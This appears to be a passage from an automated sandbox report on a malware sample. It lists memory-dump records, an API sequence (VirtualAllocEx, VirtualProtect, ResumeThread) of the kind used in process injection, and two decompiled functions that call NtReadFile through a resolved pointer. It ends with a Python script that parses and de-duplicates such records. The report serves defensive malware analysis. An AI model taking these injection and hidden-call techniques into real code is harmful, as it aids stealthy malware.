                                                                        • Opcode ID: ddf5fdeb202408fda44039d25e7ebef66d8fa5b3054625a74900f05a91bad1ce
                                                                        • Instruction ID: c4417844ff8f9913dbb5afcf1ebb64604a5de23b426eca780b6f04089f4be8fd
                                                                        • Opcode Fuzzy Hash: ddf5fdeb202408fda44039d25e7ebef66d8fa5b3054625a74900f05a91bad1ce
                                                                        • Instruction Fuzzy Hash: FB2108B5900209DFDB10CF9AC585BDEFBF4FB48324F108429E558A7240D374A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ADB69F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 6e350d942c913ea733ec0c0e9474b47e1b8edf7bc33140cd42e7f4dc3802bc52
                                                                        • Instruction ID: 36fe685acc6831c5b1a5c0765d13377878e7e00dd56faad8b89031f4798c955d
                                                                        • Opcode Fuzzy Hash: 6e350d942c913ea733ec0c0e9474b47e1b8edf7bc33140cd42e7f4dc3802bc52
                                                                        • Instruction Fuzzy Hash: 041156718002488FCF10CFAAC884BDFBBF5EF88324F11842AD969A7200C7799955CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0ADB2763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 005aa4a77d0189f6259c2a18c0e2ca3114f9f7a469c7cc670bc30db40dd5b3a9
                                                                        • Instruction ID: 292a3de2b48ece7cc7c9f6a606296c6f0026c0c3a852aadc544df3a5ef159568
                                                                        • Opcode Fuzzy Hash: 005aa4a77d0189f6259c2a18c0e2ca3114f9f7a469c7cc670bc30db40dd5b3a9
                                                                        • Instruction Fuzzy Hash: 5421E7B5900209DFCB10CF9AC584BDEFBF4FB48320F118429E959A7250D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 65a1532ab0b00374abd731b3eb6257b4e31fbf6597f4d189d96a99384c331465
                                                                        • Instruction ID: 41ff09e66d192197e7bb99356ea545138ca40e8d3db46c5a5143c1e425f5af65
                                                                        • Opcode Fuzzy Hash: 65a1532ab0b00374abd731b3eb6257b4e31fbf6597f4d189d96a99384c331465
                                                                        • Instruction Fuzzy Hash: A91128B1D042488FCB10DFAAD4847EFFBF9EF88228F158429D559A7240C775A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ADB69F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: b73b9360db46d0728ebaab8a314e554a47006a7f17c305bcc7d9cc58557e7815
                                                                        • Instruction ID: 6ffb6bb7f88137a413ba2008fe66742c1a94d4959b68a63ef2f96b7d30863d4c
                                                                        • Opcode Fuzzy Hash: b73b9360db46d0728ebaab8a314e554a47006a7f17c305bcc7d9cc58557e7815
                                                                        • Instruction Fuzzy Hash: 861126719002499FCF10DFAAC844BDFBBF5AF88324F15842AD525A7250C775A954CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 07d2aea626e4fde18c525d3307c4047d1d96f2fbb1c596beb4fdc2d99c413e9b
                                                                        • Instruction ID: 8aa2c5525ee457702c148d0ec6b426f653681a5d8443cde0989de2b1e6b280c2
                                                                        • Opcode Fuzzy Hash: 07d2aea626e4fde18c525d3307c4047d1d96f2fbb1c596beb4fdc2d99c413e9b
                                                                        • Instruction Fuzzy Hash: 891125B19042488BCB10DFAAD4447EEFBF9AB88224F15842AC529A7240C778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0ADBA31D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 7ecf770e46cda6035fb5bdab8a9a81c3c189012684b52069ac3683bb1a574a78
                                                                        • Instruction ID: 59075d8723ccc01b5142888ec4685dba494051024188aced05aa1396b8a76a2e
                                                                        • Opcode Fuzzy Hash: 7ecf770e46cda6035fb5bdab8a9a81c3c189012684b52069ac3683bb1a574a78
                                                                        • Instruction Fuzzy Hash: 5F11F2B5804209DFDB20CF9AD889BDFBBF8EB48320F11845AE955A7710D375A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.671909262.00000000006ED000.00000040.00000001.sdmp, Offset: 006ED000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45725f79f1291a0f597be7401a44d184d21631829702bde46e35c1f31a12a738
                                                                        • Instruction ID: 23802a499c3d40e2f3392976bff6b256fb7df3f638100c86fd103eacb9408932
                                                                        • Opcode Fuzzy Hash: 45725f79f1291a0f597be7401a44d184d21631829702bde46e35c1f31a12a738
                                                                        • Instruction Fuzzy Hash: 0C2107B1504384DFDB14CF10D5C4B16BBA6FB84314F28C56DD9094B346C336D847CA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.671909262.00000000006ED000.00000040.00000001.sdmp, Offset: 006ED000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a50514ec1257cf569b46b13018f77c74a6b1a79dd185fe273f272edbcee8849e
                                                                        • Instruction ID: 3f8f2319d2407a4afee6ff369a88b69cb53d8f3078daf2497c998f25f014d3a3
                                                                        • Opcode Fuzzy Hash: a50514ec1257cf569b46b13018f77c74a6b1a79dd185fe273f272edbcee8849e
                                                                        • Instruction Fuzzy Hash: 4E2150755093C08FCB12CF24D994755BF71EB46314F28C5DAD8498B6A7C33A984ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;5C
                                                                        • API String ID: 0-1261206579
                                                                        • Opcode ID: bef90648dc58769071ef95c3bb665b35995ecc979a9b6c55e535996650acb311
                                                                        • Instruction ID: 8e2c428a4c5dd79750de066fced089f699309fbc7801288781af5c6db4b88430
                                                                        • Opcode Fuzzy Hash: bef90648dc58769071ef95c3bb665b35995ecc979a9b6c55e535996650acb311
                                                                        • Instruction Fuzzy Hash: 13519AB1E056588FDB19CF6B8D5428AFBF3AFC9200F19C1FAC448AB265DB3449468F11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;5C
                                                                        • API String ID: 0-1261206579
                                                                        • Opcode ID: 4ef797e5d67659ffa2fb7631ab89057e05f76a184f7b3503a621bbe4d5d3748d
                                                                        • Instruction ID: 8f234304a5dd766cf61ca6b5f55d6655d31fbd871c6cf3b2651b559e40c97f44
                                                                        • Opcode Fuzzy Hash: 4ef797e5d67659ffa2fb7631ab89057e05f76a184f7b3503a621bbe4d5d3748d
                                                                        • Instruction Fuzzy Hash: 51415CB1E15618CBEB18CF6B8D4429EFBF3BFC9300F14C1BA850DA6214DB344A468E11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: dcu`
                                                                        • API String ID: 0-3228247770
                                                                        • Opcode ID: 89304b0cfbb44b9f5b4876f0384b06a9c9c5131a70690a838ae7b862a9df8046
                                                                        • Instruction ID: 8b29b63c3ced3b1a206e36789b870858645db7723fd0997eab630221c90463ca
                                                                        • Opcode Fuzzy Hash: 89304b0cfbb44b9f5b4876f0384b06a9c9c5131a70690a838ae7b862a9df8046
                                                                        • Instruction Fuzzy Hash: 1B1106B1E11219DBDB58CFAAD8406EEFBF7BBC8210F14C02AD509A7214DB304A018B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: dcu`
                                                                        • API String ID: 0-3228247770
                                                                        • Opcode ID: 840ea2c2a820cdb8da9647031815d3b320b9e7a0aa71ab140f31333b491c8cc1
                                                                        • Instruction ID: f28d7b19f3d98af80f1db90fb003f2eeb55ae47ba469dc078fc97833a6b3579c
                                                                        • Opcode Fuzzy Hash: 840ea2c2a820cdb8da9647031815d3b320b9e7a0aa71ab140f31333b491c8cc1
                                                                        • Instruction Fuzzy Hash: 601126B1E116599BDB58CFABD9406AEBAF7BFC8200F14C03AD409AA255DB305A018B55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3fe3d1b61b2a0bec0e21888e25c5bc0c6ed9b3a4e0dc94a4782209dc11b9908c
                                                                        • Instruction ID: 4d11b826e8d3d243f4b795575a64aae31cec58a1f9e5b80d7f60ea9fa9312ad7
                                                                        • Opcode Fuzzy Hash: 3fe3d1b61b2a0bec0e21888e25c5bc0c6ed9b3a4e0dc94a4782209dc11b9908c
                                                                        • Instruction Fuzzy Hash: 8A6138B4E1520ADFCF04CFAAC541AEEFBF2AB88310F15D42AD516AB215D734DA418F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98985a1fa485449acc56663d86fd0e424e83ae781a40d91c74e52619d72fe375
                                                                        • Instruction ID: 43056cb070dfb9c29aaf7d5e9d672e6c47ea7a591c52923b9a262eada039ba33
                                                                        • Opcode Fuzzy Hash: 98985a1fa485449acc56663d86fd0e424e83ae781a40d91c74e52619d72fe375
                                                                        • Instruction Fuzzy Hash: 816159B0E1524ADFDF04CFAAC541AEEFBF2AB88210F15D42AD525AB215D734DA418F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e33ae0dc47ef2497bad23f8b3a81c1fd7ce991eb0f44bc12c46963387983f25
                                                                        • Instruction ID: 5cc54fa3ef5c89f3c9675ef1afcc10b1e852121db70338e370a835f3ee106fcd
                                                                        • Opcode Fuzzy Hash: 5e33ae0dc47ef2497bad23f8b3a81c1fd7ce991eb0f44bc12c46963387983f25
                                                                        • Instruction Fuzzy Hash: 92513970E14669CBDB68CF66C8447EDB7B6ABC9300F05C5AAC50EB7600EB309A858F04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5383f6014a5b858a6961d7a302b63418c3aa10f5f39a1094b0748713ce5e69f1
                                                                        • Instruction ID: 9a34ddc86133c15bffd9ba2959e75f2e5f5cd2bc43deb29442ffd4ed5ae9cb61
                                                                        • Opcode Fuzzy Hash: 5383f6014a5b858a6961d7a302b63418c3aa10f5f39a1094b0748713ce5e69f1
                                                                        • Instruction Fuzzy Hash: 2F512971E10659CBDB68CF66C8447DEB7B2FBC9300F14C5AAD50AB7600EB309A868F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0563b14f791fa9a45a6e5be8ae5d320e744b266e6213254f2ee75c7c4a836ef5
                                                                        • Instruction ID: ce787361836a947a8216c0b95dca41c58be9c8e7856448abf2688086cccf6d32
                                                                        • Opcode Fuzzy Hash: 0563b14f791fa9a45a6e5be8ae5d320e744b266e6213254f2ee75c7c4a836ef5
                                                                        • Instruction Fuzzy Hash: 45518F70E14119DBDB18CFA6C980AAEFBF2FF89304F25C16AD519A7215DB309A41DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3ed8b3f7015bf25ca9c54181a07f08ac3b9f63a701319e34fe2238ef67d630e
                                                                        • Instruction ID: 0e9821d2c316ffdb15970b75f822782011521c333d23fd65671a28a7a93110bf
                                                                        • Opcode Fuzzy Hash: a3ed8b3f7015bf25ca9c54181a07f08ac3b9f63a701319e34fe2238ef67d630e
                                                                        • Instruction Fuzzy Hash: 77519E70E14119DBDB18CFA5C980AADFBF2FF89200F25C1AAD519A7215DB309942DF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b8e10546bc5c29dffb8efe7965b5a923da5d5c37c8465914903eb236d0d73db
                                                                        • Instruction ID: 63a601ed734d400b4387e5f2e2a1a9159d378baf607a52ebfb79cdc19ff06b54
                                                                        • Opcode Fuzzy Hash: 6b8e10546bc5c29dffb8efe7965b5a923da5d5c37c8465914903eb236d0d73db
                                                                        • Instruction Fuzzy Hash: EA41E370E16216DFCB49CF66C8506AEFFB2FF8A200F25C0AAC504AB605D7308941DF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3176108e5189fe578ade750fc8983825d948294b801dcfdbe18aec8cf8d23a0f
                                                                        • Instruction ID: c17435e8c4c9682b50bbdc0715963c05d1b9fcecd2c79e0ee5be0ef3272a31a6
                                                                        • Opcode Fuzzy Hash: 3176108e5189fe578ade750fc8983825d948294b801dcfdbe18aec8cf8d23a0f
                                                                        • Instruction Fuzzy Hash: 28315CB0E11219DBDB18CFAAD8416EEFBB3FBC8210F15C17AD509AB254DB349A058F15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a5ed14de41b8faa5a53f858525565a5665e757576473376055e1df18f831fdf1
                                                                        • Instruction ID: 781d32b7f1c4183e4f791dcb472d387ebc3499286d417ab6cb36fcb2ef179450
                                                                        • Opcode Fuzzy Hash: a5ed14de41b8faa5a53f858525565a5665e757576473376055e1df18f831fdf1
                                                                        • Instruction Fuzzy Hash: EE216B70E15649DFDB48CFAAD8942DFFBF3AFC9200F14C07AC508AA215E7705A468B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1970fae06cac352a731a8499aab0ff32e44a5b6720099961727947eedadf258a
                                                                        • Instruction ID: 15794b4cfc8c9c631b5fa956e7c6398754c82af4d72be7d010e37261458cdee6
                                                                        • Opcode Fuzzy Hash: 1970fae06cac352a731a8499aab0ff32e44a5b6720099961727947eedadf258a
                                                                        • Instruction Fuzzy Hash: AF210871E11619DBDB08CFABD9406DEFBF7BBC8200F14C02AD508AB214EB345A458F91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 25%
                                                                        /* This entry starts six bytes before E00418270 and is a mis-aligned decode of the same function: the
                                                                           "dec edi", "cmpsb" and the AND are not real instructions, and the literal 0x8bec8b55 passed as an extra
                                                                           call argument is the little-endian image of the bytes 55 8B EC 8B at 0x00418270 (push ebp; mov ebp, esp
                                                                           followed by the opcode byte of the next mov), read here as a push of an immediate. From 0x00418273 on,
                                                                           both listings share every address; E00418270 below is the real function. */
                                                                        			E0041826A(signed int __eax, void* __edx, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t21;
                                                                        				void* _t32;
                                                                        				intOrPtr* _t34;
                                                                        				void* _t36;
                                                                        
                                                                        				_t32 = __edi - 1;                                  /* 0x0041826a  mis-aligned: dec edi */
                                                                        				asm("cmpsb");                                      /* 0x0041826b  mis-aligned */
                                                                        				 *(__edx - 5) =  *(__edx - 5) & __eax;             /* 0x0041826c  mis-aligned */
                                                                        				_t16 = _a4;                                        /* 0x00418273  first argument: context structure */
                                                                        				_t34 = _a4 + 0xc48;                                /* 0x0041827f  function-pointer slot at context+0xc48 */
                                                                        				E00418DC0(_t32, _a4, _t34,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a); /* 0x00418287  fills the slot; 0x2a apparently selects the entry */
                                                                        				_t8 =  &_a32; /* 0x00418292 */ // 0x413d52
                                                                        				_t14 =  &_a8; /* 0x004182ad */ // 0x413d52
                                                                        				_t21 =  *((intOrPtr*)( *_t34))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, 0x8bec8b55, _t36); /* 0x004182b5  call through the slot; the API list below resolves it to NtReadFile */ // executed
                                                                        				return _t21;                                       /* 0x004182b9 */
                                                                        			}

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
                                                                        • Instruction ID: ebc89adc19509f38eaacf94272f55c7feec8d1b69a62f348563172bb044c10d1
                                                                        • Opcode Fuzzy Hash: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
                                                                        • Instruction Fuzzy Hash: F3F01DB6114149ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C634EC558BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        /* Resolved-pointer call: E00418DC0 populates a function-pointer slot at context+0xc48, then the function is
                                                                           invoked through that slot with the caller's arguments. The API list below resolves the call site at
                                                                           0x004182b5 to NtReadFile in NTDLL. */
                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                        				void* _t18;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        
                                                                        				_t13 = _a4;                                        /* 0x00418273  first argument: context structure */
                                                                        				_t28 = _a4 + 0xc48;                                /* 0x0041827f  function-pointer slot at context+0xc48 */
                                                                        				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); /* 0x00418287  fills the slot; 0x2a apparently selects the entry */
                                                                        				_t6 =  &_a32; /* 0x00418292 */ // 0x413d52
                                                                        				_t12 =  &_a8; /* 0x004182ad */ // 0x413d52
                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); /* 0x004182b5  call through the slot, resolved to NtReadFile */ // executed
                                                                        				return _t18;                                       /* 0x004182b9 */
                                                                        			}

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

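The function records on this page are emitted once per disassembled function, so a single call site (NtReadFile at 004182B5, NtCreateFile at 0041820D, NtClose at 00418315, NtAllocateVirtualMemory at 004183D9) appears under several Opcode IDs. The following is an added example, written for this report and not part of Joe Sandbox or of the sample's own code: it parses records of this shape into structured entries, collapses them to unique native-API call sites per analysed process, and shows how a decompiler immediate such as the 0x8bec8b55 in E0041826A maps back to the prologue bytes 55 8B EC. The sample text is constructed from records copied from this page with the fuzzy-hash lines dropped, and reading the first dotted field of the .sdmp file name as the process index is an assumption about the dump naming scheme.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / API ID /
Opcode ID lines) and collapse duplicate entries for one call site.
Added example; not Joe Sandbox code. SAMPLE_REPORT is constructed from records
copied from this page, with the fuzzy-hash lines omitted."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

SAMPLE_REPORT = """\
APIs
• NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
Memory Dump Source
• Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• API ID: FileRead
• Opcode ID: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
APIs
• NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
Memory Dump Source
• Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• API ID: FileRead
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
APIs
• NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
Memory Dump Source
• Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• API ID: CreateFile
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
APIs
• NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
Memory Dump Source
• Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• API ID: Close
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Memory Dump Source
• Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
• API ID:
• Opcode ID: 3fe3d1b61b2a0bec0e21888e25c5bc0c6ed9b3a4e0dc94a4782209dc11b9908c
"""

API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$")
KV_RE = re.compile(r"^•\s*(?P<key>API ID|Opcode ID):\s*(?P<val>.*)$")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    api_id: str = ""
    dump_file: str = ""
    dump_offset: int = 0
    based_on_pe: bool = False
    calls: List[Tuple[str, str, str, int]] = field(default_factory=list)  # (module, api, args, ref)


def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per function entry; the Opcode ID line closes a record."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if (m := API_RE.match(line)):
            cur.calls.append((m["module"].upper(), m["api"], m["args"], int(m["ref"], 16)))
        elif (m := SRC_RE.match(line)):
            cur.dump_file, cur.dump_offset = m["file"], int(m["offset"], 16)
            cur.based_on_pe = m["pe"] == "true"
        elif (m := KV_RE.match(line)):
            if m["key"] == "API ID":
                cur.api_id = m["val"]
            else:
                cur.opcode_id = m["val"]
                records.append(cur)
                cur = FunctionRecord()
    return records


def dump_process_index(dump_file: str) -> int:
    # Assumption about the .sdmp naming scheme: the first dotted field is the
    # index of the process in the analysis (00000000 = the submitted sample).
    return int(dump_file.split(".")[0], 16)


def unique_call_sites(records: List[FunctionRecord]) -> Dict[Tuple[str, str, int], List[str]]:
    """(module, api, ref) -> Opcode IDs of every record that contains that call site."""
    sites = defaultdict(list)
    for rec in records:
        for module, api, _args, ref in rec.calls:
            sites[(module, api, ref)].append(rec.opcode_id)
    return dict(sites)


def native_calls_by_process(records: List[FunctionRecord]) -> Dict[int, List[str]]:
    """Per process index, the sorted, de-duplicated MODULE!Api@ref call sites."""
    out = defaultdict(set)
    for rec in records:
        for module, api, _args, ref in rec.calls:
            out[dump_process_index(rec.dump_file)].add(f"{module}!{api}@{ref:08X}")
    return {pidx: sorted(v) for pidx, v in out.items()}


def const_as_code_bytes(value: int, width: int = 4) -> bytes:
    """A decompiler immediate (e.g. 0x8bec8b55) as the little-endian bytes it was read from."""
    return value.to_bytes(width, "little")


def looks_like_x86_prologue(code: bytes) -> bool:
    return code.startswith(b"\x55\x8b\xec")  # push ebp; mov ebp, esp


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(native_calls_by_process(recs), unique_call_sites(recs))
```

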